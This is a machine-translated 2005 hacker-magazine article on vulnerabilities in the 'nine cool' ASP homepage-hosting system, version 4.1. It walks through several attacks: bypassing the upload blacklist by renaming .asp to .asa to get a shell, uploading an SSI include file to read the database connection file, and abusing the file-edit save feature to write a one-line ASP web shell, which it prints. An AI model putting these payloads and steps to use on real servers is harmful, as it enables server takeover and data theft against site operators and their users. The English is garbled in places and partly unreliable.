A further exploration of nine cool network personal homepage Space Management System-vulnerability research

The author of this article: Hyun-cat [b.c.t]
This article was originally published in the "Hacker X-Files" 2005 7th, the online starting address is b.c.t (http://www.cnbct.org/showarticle.asp?id=495) and Black Forest (http://www.blackwoosd.cn)
This article is copyright "Hacker X Files" and author magazine All
--------------------------------------------------------------------------------

Hyun-Cat published a vulnerability study for the nine Cool web personal homepage Space Management system ("nine cool") in the 2004 12 issue (see the 2004-Year 12 issue, "Easy Break Free Space limit"), The version was 3.0, and recently got the 4.1 free version of nine cool programs, the official note on the correction of many loopholes, but cats always think that simple ASP program is difficult to manage the free space efficiently and safely, so simple to this set of procedures for security monitoring, results found a number of high-risk vulnerabilities, most of which can directly threaten the administrator or other The security of the user even endangers the server. Let's take a look at these vulnerabilities:

1, upload the vulnerability.


The creator of the program makes a more easily overlooked error-configuring only the type of file that is "blocked" in the background management, rather than the type of "allow" uploads, so it is easy to overlook some of the most dangerous extensions.

We look at the interface, select an ASP file upload, the program prompts the extension illegal, OK, we change the extension to ASA, upload, success, get a shell.

But we are not always good luck, if the experienced network management to Asa,cer and other files Asp.dll map deleted how to do it. We can use SSI to get sensitive information.

What is SSI, SSI is the acronym for Server Side include, which is included on the servers side, which can contain a file on the server side, which is responsible for containing the file by Ssinc.dll. For example, we commonly used in the ASP <!--#include file= "conn.asp"--> is an application of SSI.

Write a file locally, content is <!--#include file= "inc/conn.asp", save look.stm upload to the server, and then access the file, view the source file, you can see the program's data connection file content. The database of this system is not for download processing, we can download it safely. But note: If the filename is a special symbol, we should use the ASCII converter to convert the correct address.

On the upload, there is a loophole is that this system with the 5xsoft general upload class, there is no upload loopholes, this loophole is very old, I hope everyone to try their own hands.

2, save the loophole.

The new 4.1 of the nine cool, read the directory, file and delete all made a good permission to determine, if the direct change of parameters will be reported without permission, and change the file name when the program will be the same judge is not a dangerous type.

After testing, Black cat found in the file Edit save module appeared a small hole, we can successfully save the file as an ASP extension, but the program will check the contents of the file, some dangerous characters are not used, but we can use a word trojan, written in the file: <%execute  request ("value")%&gt, and then use the black Cat to improve the word Trojan client to write a new file.